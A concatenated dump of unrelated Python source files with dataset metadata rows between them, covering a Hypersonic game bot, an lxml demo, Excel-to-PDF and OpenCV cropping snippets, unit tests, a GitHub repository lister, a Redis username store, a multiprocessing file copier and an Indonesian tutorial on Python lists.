        for k, bomb in bombs.items():
            if (self.x == bomb.x and self.y == bomb.y):
                isBombUnderHero = True
                break
        return isBombUnderHero
    # Methods related to Ups
    def move_to_ups(self, posx, posy):
        """Emit a MOVE command towards a power-up on stdout."""
        print("MOVE", posx, posy, sep=" ")
    # Methods related to Enemy Bombs
    def move_away_from_bombs(self, posx_bomb, posy_bomb, grid, ebomb_reach=2):
        """Emit a MOVE away from the bomb at (posx_bomb, posy_bomb).

        NOTE(review): relies on the module-level globals ``width`` and
        ``height`` for board bounds — confirm they are set before calling.
        """
        posx = 0
        posy = 0
        dx = self.x - posx_bomb
        dy = self.y - posy_bomb
        if dx == 0:
            # Hero and bomb share a column: step to a neighbouring column
            # and away along the row.
            posx = self.x + 1 if self.x + 1 < width - 1 else self.x - 1
            if dy > 0:
                posy = self.y + 1 if self.y + 1 < height-1 else self.y - 1
            else:
                posy = self.y - 1 if self.y - 1 > 0 else self.y + 1
            # Is the target square free? ('.' means empty floor)
            if grid[posy, posx] != '.':
                posy = self.y + 2 if self.y + 2 < height - 1 else self.y - 2
        elif dy == 0:
            # Hero and bomb share a row: mirror of the column case.
            if dx > 0:
                posx = self.x + 1 if self.x + 1 < width - 1 else self.x - 1
            else:
                posx = self.x - 1 if self.x - 1 > 0 else self.x + 1
            posy = self.y + 1 if self.y + 1 < height-1 else self.y - 1
            if grid[posy, posx] != '.':
                posx = self.x + 2 if self.x + 2 < width - 1 else self.x - 2
        else:
            print("already in safe place, do not move", file=sys.stderr)
            posx = self.x
            posy = self.y
        print("MOVE", posx, posy, sep=" ")
# Creating wall class
class Wall():
    """Grid position of a single indestructible wall cell."""
    def __init__(self, x, y):
        self.x, self.y = x, y
# Dictionary saving position of all Walls on the board
walls = {}
isWall = True  # populate `walls` only on the first parsed frame (walls never move)
nwalls = 0  # next free key in `walls`
# Creating Class crate
class Crate:
    """A destructible crate: grid position plus its raw grid character."""
    def __init__(self, x, y, crate_obj):
        self.x = x
        self.y = y
        # raw character from the board row (may encode a hidden power-up)
        self.obj = crate_obj
##### START GAME #####
# Main game protocol loop (CodinGame Hypersonic style): read the board and
# entity list every turn from stdin, then print exactly one command to stdout.
# Fixes applied: initialise isFirstTurn/isFirstBomb (previously NameError),
# pass all_bombs (not the undefined `bombs`) to find_bombs_onboard, increment
# nb_crate_bomb, and send the "no more crates" MOVE to stdout.
# Set grid dimensions and HERO id
width, height, my_id = [int(i) for i in input().split()]
# Saving the grid in a matrix
grid = np.array([['.' for j in range(width)] for i in range(height)])
# Creating hero entity
hero = Hero(entity_type=0, owner=my_id)
# BUG FIX: these flags were read inside the loop but never initialised.
isFirstTurn = True
isFirstBomb = True
# game loop
while True:
    print('Turn begins...', file=sys.stderr)
    # Dictionary saving the crates
    crates_dict = {}
    ncrate = 0
    for i in range(height):
        row = input()
        # Populating the grid
        for j in range(width):
            grid[i,j] = row[j]
            # Populating the Crates (any cell that is neither floor nor wall)
            if row[j] != '.' and row[j] != 'X':
                crates_dict[ncrate] = Crate(j, i, row[j])
                ncrate += 1
            if isWall:
                # Populating the Walls
                if row[j] == 'X':
                    walls[nwalls] = Wall(j,i)
                    nwalls += 1
    print('Crates and wall populated...', file=sys.stderr)
    # Setting Wall flag to False so we do not populate the dict next turn
    # (wall positions won't move)
    isWall = False
    isHeroOnABomb = False
    # Dictionaries saving each entity type
    all_bombs = {}
    bots = {}
    obj_ups = {}
    nb_bombs = 0
    nups = 0
    nbots = 0
    # Entities
    entities = int(input())
    print("entities loaded", entities, sep=" ", file=sys.stderr)
    for i in range(entities):
        entity_type, owner, x, y, param_1, param_2 = [int(j) for j in input().split()]
        # Populating each entity dictionary
        print("entities split", entity_type, owner, x, y, param_1, param_2, sep=" ", file=sys.stderr)
        if entity_type == 0:
            if owner == my_id:
                if isFirstTurn:
                    hero.x = x
                    hero.y = y
                    isFirstTurn = False
                else:
                    hero.past_x = hero.x
                    hero.past_y = hero.y
                    hero.x = x
                    hero.y = y
                hero.param_1 = param_1
                hero.param_2 = param_2
            else:
                bots[nbots] = Entity(entity_type, owner, x, y, param_1, param_2)
                nbots += 1
            print("entities bot or hero", file=sys.stderr)
        if entity_type == 2:
            obj_ups[nups] = Entity(entity_type, owner, x, y, param_1, param_2)
            nups += 1
            print("entities up", file=sys.stderr)
        if entity_type == 1:
            all_bombs[nb_bombs] = Entity(entity_type, owner, x, y, param_1, param_2)
            nb_bombs += 1
            print("bomb added", file=sys.stderr)
            if hero.x == x and hero.y == y:
                isHeroOnABomb = True
                print("hero on bomb", file=sys.stderr)
            if owner == my_id:
                hero.bomb_reach = param_2-1
                print("reach bomb", file=sys.stderr)
    print('Entities done...', file=sys.stderr)
    # Populating the crates-with-a-nearby-bomb dictionary
    crates_bombs = {}
    nb_crate_bomb = 0
    for k, crate in crates_dict.items():
        for kb, bomb in all_bombs.items():  # renamed: inner loop shadowed `k`
            if math.fabs(bomb.x-crate.x) == 1 or math.fabs(bomb.y-crate.y) == 1:
                crates_bombs[nb_crate_bomb] = [crate.x, crate.y]
                nb_crate_bomb += 1  # BUG FIX: key was never incremented, so only one entry survived
    print('crates and crates bomb done...', file=sys.stderr)
    '''
    ##### HERO Actions #####
    -- is HERO threaten by bombs?
        yes -- go to safe place
        no -- HERO attacks: does HERO has bomb left?
            yes -- is there VILLAIN closeby?
                yes -- BOMB VILLAIN
                no -- is there CRATE nearby?
                    yes -- is there wall between HERO and CRATE?
                        yes -- [repeat - is there CRATE nearby]
                        no -- BOMB CRATE
                    no -- is there UPs nearby?
                        yes -- MOVE UP
                        no -- MOVE RANDOM CRATE
            no -- go to safe place or RANDOM CRATE
    '''
    print("Starting Turn Action...", file=sys.stderr)
    if isFirstBomb:
        print("Putting first Bomb", file=sys.stderr)
        posx_crate, posy_crate = find_crate(crates_dict, crates_bombs, random=False)
        hero.bomb_crate(posx_crate, posy_crate)
        isFirstBomb = False
    else:
        if len(all_bombs) != 0:
            print("Bombs are on board", file=sys.stderr)
            # BUG FIX: was `bombs`, a name that does not exist (NameError).
            isHeroInDanger, posx_bomb, posy_bomb, ebomb_range = find_bombs_onboard(hero, all_bombs)
            if isHeroInDanger:
                # HERO plays defence
                hero.move_away_from_bombs(posx_bomb, posy_bomb, grid, ebomb_range)
                print("HERO DANGER", file=sys.stderr)
            else:
                # NOTE(review): when hero.param_1 == 0 no command is printed
                # this turn, which stalls the game protocol — confirm intended.
                if hero.param_1 != 0:
                    # HERO plays attack
                    isBotNear, posx_bot, posy_bot = find_bot_onboard(hero,bots)
                    if isBotNear:
                        print("BOMB", posx_bot, posy_bot, sep=" ")
                    else:
                        if len(crates_dict) == 0:
                            print("No more crates", file=sys.stderr)
                            # BUG FIX: the MOVE command went to stderr, so the
                            # game never received it; commands go to stdout.
                            print("MOVE", hero.x, hero.y, sep=" ")
                        else:
                            # HERO close to crate?
                            print(hero.bomb_previous_turn, isHeroOnABomb, sep=" ", file=sys.stderr)
                            isHeroNextCrate = False
                            if not hero.bomb_previous_turn and not isHeroOnABomb:
                                isHeroNextCrate, posx_crate, posy_crate = hero.next_to_a_crate(crates_dict, crates_bombs)
                            if isHeroNextCrate:
                                hero.bomb_crate(posx_crate, posy_crate)
                                hero.bomb_previous_turn = False
                            else:
                                if len(obj_ups) != 0:
                                    isUpClose, posx_up, posy_up = find_ups_onboard(hero, obj_ups)
                                    if isUpClose:
                                        hero.move_to_ups(posx_up, posy_up)
                                        isUpClose = False
                                    else:
                                        posx_crate, posy_crate = find_crate(crates_dict, crates_bombs, random=False)
                                        hero.move_to_crate(posx_crate, posy_crate)
                                else:
                                    posx_crate, posy_crate = find_crate(crates_dict, crates_bombs)
                                    hero.move_to_crate(posx_crate, posy_crate)
| true |
f5bab6780a5ba489fea477073aa36b947ef21227 | Python | tomithy/GSOC-2012-Demo | /Archive/PhyloXMLGenerator.py | UTF-8 | 922 | 2.921875 | 3 | [] | no_license | from lxml import etree
def buildXml():
    """Demo (Python 2): build a small XML tree with lxml.etree and print it."""
    root = etree.Element("root", interesting="totally")
    # append() takes a ready-made Element; SubElement creates-and-attaches.
    root.append( etree.Element("child1") )
    etree.SubElement(root, "child").text = "Child 1"
    etree.SubElement(root, "child").text = "Child 2"
    etree.SubElement(root, "another").text = "Child 3"
    # root.insert(0, etree.Element("Child0"))
    # Elements support list-style indexing; root[1] is the first SubElement.
    child2 = root[1]
    etree.SubElement(child2, "Child0ofchild2").text = "HelloWorld"
    child0ofChild2 = child2[0]
    etree.SubElement(root, "Inbrackets").text = "Here we go"
    anotherElement = etree.Element("AppedTest")
    anotherElement.text = "Another Text"
    # Nested indexing: attach under root's second child's first child.
    root[1][0].append(anotherElement)
    # root.text = "TEXT"
    # Iterating an Element yields its direct children (Python 2 print syntax).
    for child in root:
        print child.tag
    print etree.tostring(root, pretty_print=True)
# Creates a folder clade and adds it to the given parent.
def addFolderClade(parent, foldername, uri="", tooltip=""):
    """Stub: attach a folder clade element to `parent` (not yet implemented)."""
    pass
| true |
6eddfc04583b8a406f63975a1ef31dae7cce9dbd | Python | dxc7528/Python_MachineLearning | /python.py | UTF-8 | 5,778 | 2.953125 | 3 | [] | no_license | python
convert Excel to PDF
## Author: Sirvan Almasi Jan 2017
## This script helps in automating the process of converting an excel into PDF
import win32com.client, time
o = win32com.client.Dispatch("Excel.Application")
o.Visible = False
timedate = time.strftime("%H%M__%d_%m_%Y")
wb_path = r'S:/GSA Euro Research Company Files/Property Sectors/Euro Office Sector/London Offices/Green Street Research Reports/London Office Report Feb 17/_5. Appendix - Company Snapshots - Copy.xlsm'
#wb_path = r'C:/Users/salmasi/Documents/MATLAB/xlstopdf/22.xlsm'
wb = o.Workbooks.Open(wb_path)
ws_index_list = [1,2,3] #say you want to print these sheets
path_to_pdf = r'C:/Users/salmasi/Documents/MATLAB/xlstopdf/app__'+str(timedate)+'.pdf'
wb.WorkSheets(ws_index_list).Select()
wb.ActiveSheet.ExportAsFixedFormat(0, path_to_pdf)
wb.Close(True)
copy entire excel worksheet to a new worksheet using Python win32com
# old_sheet: sheet that you want to copy
old_sheet.Copy(pythoncom.Empty, workbook.Sheets(workbook.Sheets.Count)
new_sheet = workbook.Sheets(workbook.Sheets.Count)
new_sheet.Name = 'Annual'
Instead of using the PrintOut method, use ExportAsFixedFormat. You can specify the pdf format and supply a file name. Try this:
ws.ExportAsFixedFormat(0, 'c:\users\alex\foo.pdf')
Print chosen worksheets in excel files to pdf in python
import win32com.client
o = win32com.client.Dispatch("Excel.Application")
o.Visible = False
wb_path = r'c:\user\desktop\sample.xls'
wb = o.Workbooks.Open(wb_path)
ws_index_list = [1,4,5] #say you want to print these sheets
path_to_pdf = r'C:\user\desktop\sample.pdf'
wb.WorkSheets(ws_index_list).Select()
wb.ActiveSheet.ExportAsFixedFormat(0, path_to_pdf)
Opencv and python for auto cropping
If you want to do this with OpenCV, a good starting point is to apply some simple processing to remove noise and small details from the image; you can then find the edges of the image, compute the bounding box, and crop to that area. In the case of your second image, you may need some post-processing, as the raw edges may contain noise and borders. You can do this on a pixel-by-pixel basis, or — a possibly overkill method — find all the contours in the image and take the biggest bounding box. Using this you can get the following results: First Image
And for the second one:
Second Image
The part that needs work is finding a proper thresholding method that works for all the images. Here I used different thresholds to make a binary image, as the first one was mostly white and second one was a bit darker. A first guess would be using the average intensity as a clue.
Hope this helps!
This is how I used some pre-processing and also a dynamic threshold to get it work for both of the images:
im = cv2.imread('cloth.jpg')
imgray = cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)
imgray = cv2.blur(imgray,(15,15))
ret,thresh = cv2.threshold(imgray,math.floor(numpy.average(imgray)),255,cv2.THRESH_BINARY_INV)
dilated=cv2.morphologyEx(thresh, cv2.MORPH_OPEN, cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(10,10)))
_,contours,_ = cv2.findContours(dilated,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
I also checked the contour area to remove very large contours:
new_contours=[]
for c in contours:
if cv2.contourArea(c)<4000000:
new_contours.append(c)
The number 4000000 is an estimation of the image size (width*height), big contours should have an area close to the image size.
Then you can iterate all the contours, and find the overall bounding box:
best_box=[-1,-1,-1,-1]
for c in new_contours:
x,y,w,h = cv2.boundingRect(c)
if best_box[0] < 0:
best_box=[x,y,x+w,y+h]
else:
if x<best_box[0]:
best_box[0]=x
if y<best_box[1]:
best_box[1]=y
if x+w>best_box[2]:
best_box[2]=x+w
if y+h>best_box[3]:
best_box[3]=y+h
Then you have the bounding box of all contours inside the best_box array.
https://stackoverflow.com/questions/37803903/opencv-and-python-for-auto-cropping
How to detect edge and crop an image in Python
What you need is thresholding. In OpenCV you can accomplish this using cv2.threshold().
I took a shot at it. My approach was the following:
Convert to grayscale
Threshold the image to only get the signature and nothing else
Find where those pixels are that show up in the thresholded image
Crop around that region in the original grayscale
Create a new thresholded image from the crop that isn't as strict for display
Here was my attempt, I think it worked pretty well.
import cv2
import numpy as np
# load image
img = cv2.imread('image.jpg')
rsz_img = cv2.resize(img, None, fx=0.25, fy=0.25) # resize since image is huge
gray = cv2.cvtColor(rsz_img, cv2.COLOR_BGR2GRAY) # convert to grayscale
# threshold to get just the signature
retval, thresh_gray = cv2.threshold(gray, thresh=100, maxval=255, type=cv2.THRESH_BINARY)
# find where the signature is and make a cropped region
points = np.argwhere(thresh_gray==0) # find where the black pixels are
points = np.fliplr(points) # store them in x,y coordinates instead of row,col indices
x, y, w, h = cv2.boundingRect(points) # create a rectangle around those points
x, y, w, h = x-10, y-10, w+20, h+20 # make the box a little bigger
crop = gray[y:y+h, x:x+w] # create a cropped region of the gray image
# get the thresholded crop
retval, thresh_crop = cv2.threshold(crop, thresh=200, maxval=255, type=cv2.THRESH_BINARY)
# display
cv2.imshow("Cropped and thresholded image", thresh_crop)
cv2.waitKey(0) | true |
86ea7f7f8cc8fba6249115f16824e7413261364a | Python | HaigangLiu/gyro-city-xrays | /test/test_helper_function.py | UTF-8 | 2,061 | 3.265625 | 3 | [] | no_license | import unittest
from helper_functions import sampler_imbalanced, compute_cross_entropy_weights, f1_calculator_for_confusion_matrix
import pandas as pd
import numpy as np
from sklearn.metrics import f1_score, confusion_matrix
from data_utilities import DataConstructor
class TestHelperFunctions(unittest.TestCase):
    """Unit tests for the sampler/F1/cross-entropy helpers in helper_functions."""
    def test_sampler_imbalanced(self):
        """Sampler weights should equalise expected draws of both classes."""
        fake_labels = np.random.choice(2,150, int)
        sampler = sampler_imbalanced(fake_labels)
        ratio_of_ones = sum(fake_labels)/len(fake_labels)
        prob_of_zero = 1 - ratio_of_ones  # NOTE(review): unused below
        # if there is 1, 1, 0. then the prob to sample 1 is set to 1/3. The expected number of sample will be 2x1/3 = 2/3. The expected number of zeros is going to be 1*2/3 = 2/3. Hence they are equally likely to be sampled.
        for i, j in zip(fake_labels, sampler.weights):
            if i == 1:
                self.assertAlmostEqual(ratio_of_ones/(1 - ratio_of_ones), 1/j.item())
    def test_f1_calculator_for_confusion_matrix(self):
        """F1 computed from a confusion matrix must match sklearn's f1_score."""
        # Confusion matrix for y_true/y_pred below: [[TN, FP], [FN, TP]].
        y_true = np.array([0,1,1,1,1,1,1, 0, 0])
        y_pred = np.array([1,1,1,1,1,1,1, 0, 0])
        matrix = np.array([[2, 1], [0, 6]])
        f1 = f1_calculator_for_confusion_matrix(matrix)
        f1_standard = f1_score(y_true, y_pred)
        self.assertAlmostEqual(f1, f1_standard)
    def test_compute_cross_entropy_weights(self):
        """Class weights should equal (positive fraction, negative fraction)."""
        # NOTE(review): hard-coded machine-specific paths — this test only
        # runs on the original author's machine.
        DATA_DIR = "/Users/haigangliu/ImageData/ChestXrayData/"
        info_dir = '/Users/haigangliu/ImageData/Data_Entry_2017.csv'
        image_info = pd.read_csv(info_dir).iloc[0:1000,:]
        random_labels = np.random.randint(0, 2, image_info.shape[0], int)
        image_info['labels'] = random_labels
        torch_data_set = DataConstructor(DATA_DIR, image_info)
        positive_percentage = sum(random_labels)/image_info.shape[0]
        weights = compute_cross_entropy_weights(torch_data_set)
        self.assertAlmostEqual(weights[0], positive_percentage, places = 4)
        self.assertAlmostEqual(weights[1], 1-positive_percentage, places = 4)
self.assertAlmostEqual(weights[1], 1-positive_percentage, places = 4)
# Allow running this test module directly (python test_helper_function.py).
if __name__ == '__main__':
    unittest.main()
| true |
aff718b6b589a880226012faa19b2977ccfde9a7 | Python | ZombieSave/Python | /Методы сбора и обработки данных из сети Интернет/Урок1/Задание1.py | UTF-8 | 923 | 3.296875 | 3 | [] | no_license | # 1. Посмотреть документацию к API GitHub, разобраться как вывести список репозиториев для конкретного пользователя,
# сохранить JSON-вывод в файле *.json.
import requests
import json
print("Имя пользователя:")
userName = input()
url = f"https://api.github.com/users/{userName}/repos"
headers = {"Accept": "application/vnd.github.v3+json"} # рекоммендовано в разделе Resources in the REST API
response = requests.get(url, headers=headers)
print(f"Status code: {response.status_code}")
if response.status_code == 200:
repositories = response.json()
with open(f"Repositories_{userName}.json", "w") as file:
json.dump(repositories, file)
print(f"List of repositories of user {userName}:")
for repos in repositories:
print(repos["name"])
| true |
964715d854155428576c3f9179291ab2fb8b045d | Python | ratularora/tkinter-programs-in-python | /4check.py | UTF-8 | 326 | 2.84375 | 3 | [] | no_license | import Tkinter
import os
a=Tkinter.Tk()
a.title("test")
a.geometry("150x100")
a.configure(bg="yellow")
v1=Tkinter.IntVar()
c=0
def func():
global c
c=c+1
if(c%2!=0):
os.system("firefox &")
else:
os.system("pkill firefox")
c1=Tkinter.Checkbutton(a,text="firefox",bg="yellow",command=func)
c1.pack()
a.mainloop()
| true |
d4312f5f3af89768aae58525163f1692acc760dc | Python | cpsleme/BestRouteApp | /cli.py | UTF-8 | 1,946 | 3.375 | 3 | [] | no_license | import sys
import re
from model import GraphBase
def output_bestroute(result_input):
    """Format a best-route search result for display.

    Args:
        result_input: mapping with keys "Path" (list of airport codes) and
            "Cost" (numeric total cost); an empty mapping means no route
            was found.

    Returns:
        A string like "GRU - CDG > $75", or a not-found message.
    """
    if not result_input:
        return "No routes found."  # BUG FIX: was "founded"
    # Join the hops with " - " instead of the original manual accumulation loop.
    path = " - ".join(result_input["Path"])
    return path + " > $" + str(result_input["Cost"])
if __name__ == '__main__':
    # CLI entry point: load a routes CSV, then answer best-route queries
    # interactively until the user types "bye".
    parameters = sys.argv
    if len(parameters) < 2:
        print(f"Please, type: python cli.py <file.csv>")
        sys.exit(0)
    if parameters[1] in ['help', '-h', '--help']:
        print(f"Please, type: python cli.py <file.csv>")
        sys.exit(0)
    # Test and load files
    filecsv = parameters[1]
    route_db = GraphBase(filecsv)
    if not route_db.conn() or not route_db.hasvertices():
        print(f"Please, type a valid csv file.")
        sys.exit(0)
    else:
        print(f"Initial routes added from file {filecsv}.")
    # Routes look like "GRU-CDG": two 3-letter IATA codes.
    input_pattern = r"[A-Z]{3}-[A-Z]{3}$"
    # Infinite looping for input routes
    while 1:
        input_route = input("please enter the route (bye to exit): ")
        if input_route.lower() == "bye":
            sys.exit()
        input_route = input_route.upper()
        if bool(re.match(input_pattern, input_route)):
            start, finish = input_route.split("-")
            if start == finish:
                print("Origin is equal destiny, please enter a valid route.")
            else:
                result = route_db.shortest_route(start, finish)
                print(output_bestroute(result))
        else:
            print("")
            print("please enter a route, example: GRU-CDG")
| true |
96884bbf4f9cc325fe2134e67adce00040aa323e | Python | yxlwfds/flask-Mxonline | /app/utils/utils.py | UTF-8 | 3,603 | 3.078125 | 3 | [] | no_license | from math import ceil
from string import ascii_letters
import random
def createsuperuser():
    """Interactively create an administrator account (Django-style helper).

    Prompts on stdin until an unused username is given, then stores a new
    confirmed User with the Administrator role.
    """
    # Imports are local to avoid a circular import with the app package.
    from app.models import User, Role
    from app import db
    Role.insert_roles()
    user = input("please input super user:")
    result = User.query.filter_by(username=user).first()
    # Re-prompt while the chosen username already exists.
    while result:
        user = input("please input again:")
        result = User.query.filter_by(username=user).first()
    passwd = input("please input password:")
    u = User()
    u.username = user
    u.name = user
    u.confirmed = True
    role = Role.query.filter_by(name='Administrator').first()
    u.role = role
    # NOTE(review): presumably User.password is a setter that hashes the
    # value — confirm it is not stored in plain text.
    u.password = passwd
    db.session.add(u)
    db.session.commit()
class Pagination:
    """Paginate an in-memory list, mimicking Flask-SQLAlchemy's Pagination.

    Unlike the database-backed original, ``items`` holds the *entire*
    result list; ``get_items`` slices out the current page.
    """

    def __init__(self, page, per_page, items=None):
        # current page number, 1-indexed
        self.page = page
        # number of items displayed per page
        self.per_page = per_page
        # total number of items matching the query
        self.total = len(items)
        # the full list of items (not just the current page)
        self.items = items

    @property
    def pages(self):
        """Total number of pages (0 when per_page is 0)."""
        return 0 if self.per_page == 0 else int(ceil(self.total / self.per_page))

    @property
    def has_prev(self):
        """True when a previous page exists."""
        return self.page > 1

    @property
    def prev_num(self):
        """Number of the previous page, or None on the first page."""
        return self.page - 1 if self.has_prev else None

    @property
    def has_next(self):
        """True when a further page exists."""
        return self.page < self.pages

    @property
    def next_num(self):
        """Number of the next page, or None on the last page."""
        return self.page + 1 if self.has_next else None

    def iter_pages(self, left_edge=2, left_current=2,
                   right_current=5, right_edge=2):
        """Yield page numbers for a pager widget, with None marking gaps.

        Pages near the edges and near the current page are emitted; a
        single None stands in for each skipped run.  Typical template use::

            {%- for page in pagination.iter_pages() %}
              {{ page if page else '…' }}
            {%- endfor %}
        """
        previous = 0
        for num in range(1, self.pages + 1):
            near_left_edge = num <= left_edge
            near_current = self.page - left_current - 1 < num < self.page + right_current
            near_right_edge = num > self.pages - right_edge
            if near_left_edge or near_current or near_right_edge:
                if previous + 1 != num:
                    yield None
                yield num
                previous = num

    @property
    def get_items(self):
        """The slice of ``items`` belonging to the current page."""
        start = self.per_page * (self.page - 1)
        if self.page == self.pages:
            return self.items[start:]
        return self.items[start:start + self.per_page]
return data
def random_verify_code(code_length=8):
    """Return a pseudo-random alphanumeric code of ``code_length`` characters.

    Not cryptographically secure — uses the ``random`` module.
    """
    alphabet = ascii_letters + '0123456789'
    picked = [random.choice(alphabet) for _ in range(code_length)]
    return "".join(picked)
# Manual smoke test: print one random verification code.
if __name__ == "__main__":
    print(random_verify_code())
| true |
89d2dc8a71f3a0ed68b73c7b339f48488de9f996 | Python | claudiosouzabrito/UFPB | /PO/po.py | UTF-8 | 2,342 | 3.0625 | 3 | [] | no_license | '''
DISCIPLINA DE PESQUISA OPERACIONAL: PROJETO 1
PROFESSOR: TEOBALDO LEITE BULHOES JUNIOR
ALUNOS:
Caio Victor do Amaral Cunha Sarmento - 20170021332
Claudio Souza Brito - 20170023696
Gabriel Teixeira Patrício - 20170170889
'''
from __future__ import print_function
from ortools.linear_solver import pywraplp
file = open("instance5.txt", "r") #Abre o arquivo de entrada
lines = file.readlines()
vertices = int(lines[0])
arcs = int(lines[1])
origins = int(lines[2])
escoadores = int(lines[3])
start_nodes = []
end_nodes = []
capacities = []
supplies = [0] * vertices
unit_costs = []
var_arcos = [0] * (arcs + 1)
constraint = [0] * vertices
for line in lines[4:]:
line = list(map(int, line.split(' ',)))
start_nodes.append(line[0])
end_nodes.append(line[1])
capacities.append(line[2])
unit_costs.append(0)
#transformando em PFCM
start_nodes.append(escoadores)
end_nodes.append(origins)
capacities.append(10000) #"infinito kkkk"
unit_costs.append(-1)
# Adaptando para modelagem de programacao linear, e uso do solver de programacao linear
solver = pywraplp.Solver('LinearProgrammingExample',
pywraplp.Solver.GLOP_LINEAR_PROGRAMMING)
# Criando as variaveis(arcos) e limitando entre 0 e capacidade maxima (definida no problema).
for i in range(len(var_arcos)):
var_arcos[i] = solver.NumVar(0, capacities[i], str(i))
# Definindo as restricoes, a soma dos fluxos que entra em um vertice eh igual a soma dos fluxoes que saem
for i in range(vertices):
constraint[i] = solver.Constraint(0,0)
for j in range(len(start_nodes)):
if(start_nodes[j] == i):
constraint[i].SetCoefficient(var_arcos[j], -1)
for k in range(len(end_nodes)):
if(end_nodes[k] == i):
constraint[i].SetCoefficient(var_arcos[k], 1)
# Criando funcao objetiva: somatorio de todos os fluxos dos arcos vezes o custo deles
objective = solver.Objective()
for i in range(len(var_arcos)):
objective.SetCoefficient(var_arcos[i], unit_costs[i])
objective.SetMinimization()
solver.Solve()
opt_solution = 0
print("arcos nao nulos:")
for i in range(len(var_arcos)):
opt_solution = opt_solution + unit_costs[i]*var_arcos[i].solution_value()
if(var_arcos[i].solution_value() != 0):
print("arco: ", start_nodes[i], "-> ", end_nodes[i], ": ", var_arcos[i].solution_value())
print('Solucao otimizada =', -1*opt_solution)
| true |
b8ad8114c3bcfcc321dd5f279772beda3a7d1657 | Python | pippy360/zniki | /database/usernameDatabase.py | UTF-8 | 676 | 2.65625 | 3 | [] | no_license | import redis
keyFormat = 'username_{0}'  # per-username key holding that user's id
username_list_key = 'all_username_list'  # Redis list of every known username
# Module-level connection to a local Redis instance (default port).
usernameRedisDB = redis.StrictRedis( '127.0.0.1', 6379 )
def getAllUsernames():
    """Return every stored username (as bytes, per redis-py defaults)."""
    return usernameRedisDB.lrange(username_list_key, 0, -1)
def addUsername(username, userId):
    """Register a username: add it to the global list and map it to userId."""
    usernameRedisDB.lpush(username_list_key, username)
    key = _usernameKey(username)
    usernameRedisDB.set(key, userId)
def removeUsername(username):
    """Delete a username from the global list and drop its id mapping."""
    # count=0 removes every occurrence of the value from the list.
    usernameRedisDB.lrem(username_list_key, 0, username)
    key = _usernameKey(username)
    usernameRedisDB.delete(key)
def getUsernameUserId(username):
    """Return the user id stored for `username` (None if absent)."""
    key = _usernameKey(username)
    return usernameRedisDB.get(key)
def _usernameKey(username):
    """Build the Redis key under which a username's user id is stored."""
    return keyFormat.format(username)
| true |
557b99eb7635015a858e546a037e6d916b269ac7 | Python | pengwa1234/unbuntuCode | /process/copyFile.py | UTF-8 | 759 | 2.984375 | 3 | [] | no_license | from multiprocessing import Pool
import os
import time
def copyFile(name, oldFileName, newFileName):
    """Copy the text file `name` from directory `oldFileName` into
    directory `newFileName` (same file name).

    BUG FIX: the original used bare open()/close() pairs, leaking both
    handles if read() or write() raised; with-blocks guarantee closure.
    """
    src = os.path.join(oldFileName, name)
    dst = os.path.join(newFileName, name)
    print("read file start")
    with open(src, "r") as fr:
        content = fr.read()
    print("write file start")
    with open(dst, "w") as fw:
        fw.write(content)
def main():
    """Prompt for a source directory and copy every file in it into a new
    sibling directory ("<name>复件") using a pool of 5 worker processes."""
    oldFileName=input("请输入旧的文件夹名字:")
    newFileName=oldFileName+"复件"
    #print(newFileName)
    # Fails with FileExistsError if the destination already exists.
    os.mkdir(newFileName)
    filenames=os.listdir(oldFileName)
    print(filenames)
    pool=Pool(5)
    for name in filenames:
        print("文件名是%s"%name)
        # Dispatch each copy asynchronously to a worker process.
        pool.apply_async(copyFile,args=(name,oldFileName,newFileName))
    pool.close()
    pool.join()
if __name__=="__main__":
    main()
| true |
3ee0f2b9bffc70d9dbb36f17bc26d8bf7bc6fda7 | Python | zacky131/PythonProgramming | /Pyhton Teaching/Belajar Python untuk pemula/Lesson_3_List_script.py | UTF-8 | 2,957 | 3.84375 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 18 22:24:03 2018
@author: zacky
"""
'''
Halo semua apa kabar, kembali lagi bersama saya untuk melanjutkan tutorial
Python bagian ketiga .Kali ini saya akan membahas mengenai list di Python.
Apakah itu lists? list adalah kumpulan dari beberapa items yang mengikuti
urutan tertentu. Kita dapat membuat apa saja di dalam list, meliputi huruf, angka
dan sebagainya. Dalam Python, tanda braket kotak ([]) mengindikasinkan list.
Setiap element di dalam list dipisahkan oleh tanda kommma.
Untuk lebih jelas mari kita lihat contoh di bawah ini
'''
kendaraan = ['mobil', 'motor', 'becak', 'kereta', 'bus', 'pesawat terbang', 'perahu']
#print(kendaraan)
'''
Jika kita memerintahkan Python untuk print list, maka hasilnya akan kembali ke pada list
tersebut termasuk tanda kurung kotak nya. Oleh karena itu, mari kita mencoba hal lain,
misalnya untuk mengakses element di dalam list tersebut.
'''
#Mengakses element di dalam list
'''
List adalah koleksi element yang terurut, sehingga kita dapat memerintahkan Python
posisi ataupun index dari item yang diinginkan. Untuk mengaksesnya, kita dapat menulis
nama dari list tersebut, diikuti oleh index di dalam tanda kurung kotak ([])
'''
print(kendaraan[0]) #beri contoh untuk yang lain dan jelaskan
'''
Index posisi dimulai dari angka 0 hingga element list terakhir, jika melebihinya
akan ada peringatan error
'''
print(kendaraan[-1])
'''
untuk mengakses list, dapat pula dari arah berlawanan atau dari list terakhir
dengan memberi tanda negative pada index yang di inginkan
'''
# Menggunakan nilai individual dari dalam list
kalimat = "Kendaraan yang sering saya gunakan adalah " + kendaraan[1].title() + "."
print(kalimat)
# Mengubah, menambah dan menghapus element di dalam list
mobil = ['Toyota', 'Honda', 'Volkswagen', 'BMW', 'Mercedes']
print (mobil)
'''
Item pertama adalah Toyota, bagaimana kita mengubahnya?
'''
# Mengubah element di dalam list
mobil[0] = 'Esemka'
print(mobil)
# Menambah element di dalam list
mobil.append('Suzuki')
print(mobil)
'''
Metode append() memudahkan kitu untuk membuat list secara dinamik
'''
motor = []
motor.append('honda')
motor.append('yamaha')
motor.append('vespa')
print(motor)
## Menyisipi element kedalam list
#motor.insert(0, 'ducati')
#print(motor)
## Menghapus element dalam list
#del motor[1]
#print (motor)
## Menghapus element dengan metode lain pop()
#'''
#metode pop() akan menghapus element yang paling akhir
#'''
#popped_motor = motor.pop()
#print (motor)
## Menghapus dengan pop() di posisi manapun
#motor_pertama = motor.pop(0)
# Menghapus element berdasarkan nilai
motor = ['honda', 'yamaha', 'suzuki', 'ducati']
print (motor)
motor.remove('yamaha')
print(motor)
# Mengorganisasikan list
mobil = ['ford', 'audi', 'chevrolet', 'subaru']
